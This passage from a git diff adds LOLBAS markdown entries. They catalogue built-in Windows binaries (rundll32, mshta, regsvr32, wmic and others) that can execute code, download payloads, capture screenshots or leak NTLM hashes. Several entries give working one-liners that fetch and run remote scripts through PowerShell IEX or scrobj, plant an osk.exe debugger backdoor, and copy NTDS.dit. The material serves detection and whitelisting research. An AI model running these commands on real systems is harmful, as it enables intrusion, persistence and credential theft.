|   * C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ||||
|     | ||||
| * Notes: Thanks to Moriarty - @Moriarty_Meng   | ||||
|     | ||||
							
								
								
									
										18
									
								
								Archive-Old-Version/OSBinaries/PresentationHost.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								Archive-Old-Version/OSBinaries/PresentationHost.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| ## PresentationHost.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Presentationhost.exe C:\temp\Evil.xbap | ||||
| Executes the target XAML Browser Application (XBAP) file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\PresentationHost.exe      | ||||
|   * c:\windows\sysWOW64\PresentationHost.exe     | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										24
									
								
								Archive-Old-Version/OSBinaries/Print.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										24
									
								
								Archive-Old-Version/OSBinaries/Print.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,24 @@ | ||||
| ## Print.exe | ||||
| * Functions: Download, Copy, Add ADS | ||||
| ``` | ||||
|  | ||||
| print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe | ||||
| Copy file.exe into the Alternate Data Stream (ADS) of file.txt. | ||||
|  | ||||
| print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | ||||
| Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe | ||||
|  | ||||
| print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | ||||
| Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Oddvarmoe/status/985518877076541440 | ||||
|   * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\print.exe | ||||
|   * C:\Windows\SysWOW64\print.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										23
									
								
								Archive-Old-Version/OSBinaries/Psr.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										23
									
								
								Archive-Old-Version/OSBinaries/Psr.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,23 @@ | ||||
| ## Psr.exe | ||||
| * Functions: Surveillance | ||||
| ``` | ||||
|  | ||||
| psr.exe /start /gui 0 /output c:\users\user\out.zip | ||||
| Capture screenshots of the desktop and save them in the target .ZIP file. | ||||
|  | ||||
| psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip | ||||
| Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file. | ||||
|  | ||||
| psr.exe /stop | ||||
| Stop the Problem Step Recorder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Psr.exe | ||||
|   * C:\Windows\SysWOW64\Psr.exe | ||||
|     | ||||
| * Notes: Thanks to    | ||||
|     | ||||
							
								
								
									
										25
									
								
								Archive-Old-Version/OSBinaries/Regasm.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										25
									
								
								Archive-Old-Version/OSBinaries/Regasm.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,25 @@ | ||||
| ## Regasm.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| regasm.exe /U AllTheThingsx64.dll | ||||
| Loads the target .DLL file and executes the UnRegisterClass function. | ||||
|  | ||||
| regasm.exe AllTheThingsx64.dll | ||||
| Loads the target .DLL file and executes the RegisterClass function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Register-cimprovider.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Register-cimprovider -path "C:\folder\evil.dll" | ||||
| Load the target .DLL. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Register-cimprovider.exe | ||||
|   * c:\windows\sysWOW64\Register-cimprovider.exe | ||||
|     | ||||
| * Notes: Thanks to PhilipTsukerman - @PhilipTsukerman   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Regsvcs.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Regsvcs.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Regsvcs.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| regsvcs.exe AllTheThingsx64.dll | ||||
| Loads the target .DLL file and executes the RegisterClass function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Regsvr32.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Regsvr32.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Regsvr32.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| Execute the specified remote .SCT script with scrobj.dll. | ||||
|  | ||||
|  | ||||
| Execute the specified local .SCT script with scrobj.dll. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\regsvr32.exe | ||||
|   * C:\Windows\SysWOW64\regsvr32.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										21
									
								
								Archive-Old-Version/OSBinaries/Replace.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								Archive-Old-Version/OSBinaries/Replace.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| ## Replace.exe | ||||
| * Functions: Copy, Download | ||||
| ``` | ||||
|  | ||||
| replace.exe C:\Source\File.cab C:\Destination /A | ||||
| Copy the specified file to the destination folder. | ||||
|  | ||||
| replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | ||||
| Copy the specified file to the destination folder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/elceef/status/986334113941655553 | ||||
|   * https://twitter.com/elceef/status/986842299861782529 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\replace.exe | ||||
|   * C:\Windows\SysWOW64\replace.exe | ||||
|     | ||||
| * Notes: Thanks to elceef - @elceef   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSBinaries/Robocopy.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSBinaries/Robocopy.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## Robocopy.exe | ||||
| * Functions: Copy | ||||
| ``` | ||||
|  | ||||
| Robocopy.exe C:\SourceFolder C:\DestFolder | ||||
| Copy the entire contents of the SourceFolder to the DestFolder. | ||||
|  | ||||
| Robocopy.exe \\SERVER\SourceFolder C:\DestFolder | ||||
| Copy the entire contents of the SourceFolder to the DestFolder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\binary.exe | ||||
|   * c:\windows\sysWOW64\binary.exe | ||||
|     | ||||
| * Notes: Thanks to Name of guy - @twitterhandle   | ||||
|     | ||||
							
								
								
									
										26
									
								
								Archive-Old-Version/OSBinaries/Rpcping.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										26
									
								
								Archive-Old-Version/OSBinaries/Rpcping.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,26 @@ | ||||
| ## Rpcping.exe | ||||
| * Functions: Credentials | ||||
| ``` | ||||
|  | ||||
| rpcping -s 127.0.0.1 -t ncacn_np | ||||
| Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|  | ||||
| rpcping -s 192.168.1.10 -ncacn_np | ||||
| Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|  | ||||
| rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM | ||||
| Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/subtee/status/872797890539913216 | ||||
|   * https://github.com/vysec/RedTips | ||||
|   * https://twitter.com/vysecurity/status/974806438316072960 | ||||
|   * https://twitter.com/vysecurity/status/873181705024266241 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\rpcping.exe | ||||
|   * C:\Windows\SysWOW64\rpcping.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity   | ||||
|     | ||||
							
								
								
									
										36
									
								
								Archive-Old-Version/OSBinaries/Rundll32.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										36
									
								
								Archive-Old-Version/OSBinaries/Rundll32.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,36 @@ | ||||
| ## Rundll32.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| rundll32.exe AllTheThingsx64,EntryPoint | ||||
| Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | ||||
| Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | ||||
| Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | ||||
| Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | ||||
| Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | ||||
|  | ||||
| rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | ||||
| Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | ||||
|   * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\rundll32.exe | ||||
|   * C:\Windows\SysWOW64\rundll32.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSBinaries/Runonce.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSBinaries/Runonce.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## Runonce.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Runonce.exe /AlternateShellStartup | ||||
| Executes a Run Once Task that has been configured in the registry. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/990717080805789697 | ||||
|   * https://cmatskas.com/configure-a-runonce-task-on-windows/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\runonce.exe | ||||
|   * c:\windows\sysWOW64\runonce.exe | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
| Requires Administrative access.   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Runscripthelper.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Runscripthelper.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Runscripthelper.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test | ||||
| Execute the PowerShell script named test.txt. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe     | ||||
|   * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe      | ||||
|     | ||||
| * Notes: Thanks to Matt Graeber - @mattifestation   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSBinaries/SC.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSBinaries/SC.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## SC.exe | ||||
| * Functions: Execute, Read ADS, Create Service, Start Service | ||||
| ``` | ||||
|  | ||||
| sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | ||||
| sc start evilservice | ||||
|  | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\sc.exe | ||||
|   * C:\Windows\SysWOW64\sc.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Scriptrunner.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Scriptrunner.exe -appvscript calc.exe | ||||
| Execute calc.exe. | ||||
|  | ||||
| ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" | ||||
| Execute the calc.cmd script on the remote share. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/KyleHanslovan/status/914800377580503040 | ||||
|   * https://twitter.com/NickTyrer/status/914234924655312896 | ||||
|   * https://github.com/MoooKitty/Code-Execution | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\scriptrunner.exe | ||||
|   * c:\windows\sysWOW64\scriptrunner.exe | ||||
|     | ||||
| * Notes: Thanks to Nick Tyrer - @NickTyrer   | ||||
|     | ||||
| @@ -0,0 +1,16 @@ | ||||
| ## SyncAppvPublishingServer.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" | ||||
| Example command on how inject Powershell code into the process | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/monoxgas/status/895045566090010624 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
|     | ||||
| * Notes: Thanks to Nick Landers - @monoxgas   | ||||
|     | ||||
							
								
								
									
										58
									
								
								Archive-Old-Version/OSBinaries/WMIC.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										58
									
								
								Archive-Old-Version/OSBinaries/WMIC.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,58 @@ | ||||
| ## WMIC.exe | ||||
| * Functions: Reconnaissance, Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| wmic.exe process call create calc | ||||
| Execute calc.exe. | ||||
|  | ||||
| wmic.exe process call create "c:\ads\file.txt:program.exe" | ||||
| Execute a .EXE file stored as an Alternate Data Stream (ADS). | ||||
|  | ||||
| wmic.exe useraccount get /ALL | ||||
| List the user accounts on the machine. | ||||
|  | ||||
| wmic.exe process get caption,executablepath,commandline | ||||
| Gets the command line used to execute a running program. | ||||
|  | ||||
| wmic.exe qfe get description,installedOn /format:csv | ||||
| Gets a list of installed Windows updates. | ||||
|  | ||||
| wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") | ||||
| Check to see if the target system is running SQL. | ||||
|  | ||||
| get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" | ||||
| Use the PowerShell cmdlet to list the shares on a remote server. | ||||
|  | ||||
| wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
| Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. | ||||
|  | ||||
| wmic.exe /node:"192.168.0.1" process call create "evil.exe" | ||||
| Execute evil.exe on the remote system. | ||||
|  | ||||
| wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | ||||
| Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. | ||||
|  | ||||
| wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | ||||
| Create a volume shadow copy of NTDS.dit that can be copied. | ||||
|  | ||||
| wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
| Execute a script contained in the target .XSL file hosted on a remote server. | ||||
|  | ||||
| wmic.exe os get /format:"MYXSLFILE.xsl" | ||||
| Executes JScript or VBScript embedded in the target XSL stylesheet. | ||||
|  | ||||
| wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | ||||
| Executes JScript or VBScript embedded in the target remote XSL stylsheet. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory | ||||
|   * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html | ||||
|   * https://twitter.com/subTee/status/986234811944648707 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\wbem\wmic.exe | ||||
|   * c:\windows\sysWOW64\wbem\wmic.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSBinaries/Wab.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSBinaries/Wab.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## Wab.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Wab.exe | ||||
| Loads a DLL configured in the registry under HKLM. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ | ||||
|   * https://twitter.com/Hexacorn/status/991447379864932352 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Program Files\Windows Mail\wab.exe     | ||||
|   * C:\Program Files (x86)\Windows Mail\wab.exe     | ||||
|     | ||||
| * Notes: Thanks to Adam - @Hexacorn | ||||
| Requires registry changes, Requires Administrative Access   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Wscript.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Wscript.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Wscript.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| wscript c:\ads\file.txt:script.vbs | ||||
| Executes the .VBS script stored as an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * ? | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\wscript.exe | ||||
|   * c:\windows\sysWOW64\wscript.exe | ||||
|     | ||||
| * Notes: Thanks to ?   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Xwizard.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Xwizard.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Xwizard.exe | ||||
| * Functions: DLL hijack, Execute | ||||
| ``` | ||||
|  | ||||
| xwizard.exe | ||||
| Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. | ||||
|  | ||||
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | ||||
| Xwizard.exe running a custom class that has been added to the registry. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ | ||||
|   * https://www.youtube.com/watch?v=LwDHX7DVHWU | ||||
|   * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\xwizard.exe | ||||
|   * c:\windows\sysWOW32\xwizard.exe | ||||
|     | ||||
| * Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer   | ||||
|     | ||||
							
								
								
									
										26
									
								
								Archive-Old-Version/OSBinaries/hh.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										26
									
								
								Archive-Old-Version/OSBinaries/hh.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,26 @@ | ||||
| ## hh.exe | ||||
| * Functions: Download, Execute | ||||
| ``` | ||||
|  | ||||
| HH.exe http://www.google.com | ||||
| Opens google's web page with HTML Help. | ||||
|  | ||||
| HH.exe C:\ | ||||
| Opens c:\\ with HTML Help. | ||||
|  | ||||
| HH.exe c:\windows\system32\calc.exe | ||||
| Opens calc.exe with HTML Help. | ||||
|  | ||||
| HH.exe http://some.url/script.ps1 | ||||
| Open the target PowerShell script with HTML Help. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\hh.exe | ||||
|   * c:\windows\sysWOW64\hh.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										30
									
								
								Archive-Old-Version/OSBinaries/mshta.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										30
									
								
								Archive-Old-Version/OSBinaries/mshta.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,30 @@ | ||||
| ## mshta.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| mshta.exe evilfile.hta | ||||
| Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|  | ||||
| mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | ||||
| Executes VBScript supplied as a command line argument. | ||||
|  | ||||
| mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
| Executes JavaScript supplied as a command line argument. | ||||
|  | ||||
| mshta.exe "C:\ads\file.txt:file.hta" | ||||
| Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md | ||||
|   * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | ||||
|   * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\mshta.exe | ||||
|   * C:\Windows\SysWOW64\mshta.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										21
									
								
								Archive-Old-Version/OSBinaries/odbcconf.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								Archive-Old-Version/OSBinaries/odbcconf.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| ## odbcconf.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| odbcconf -f file.rsp | ||||
| Load DLL specified in target .RSP file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b | ||||
|   * https://github.com/woanware/application-restriction-bypasses | ||||
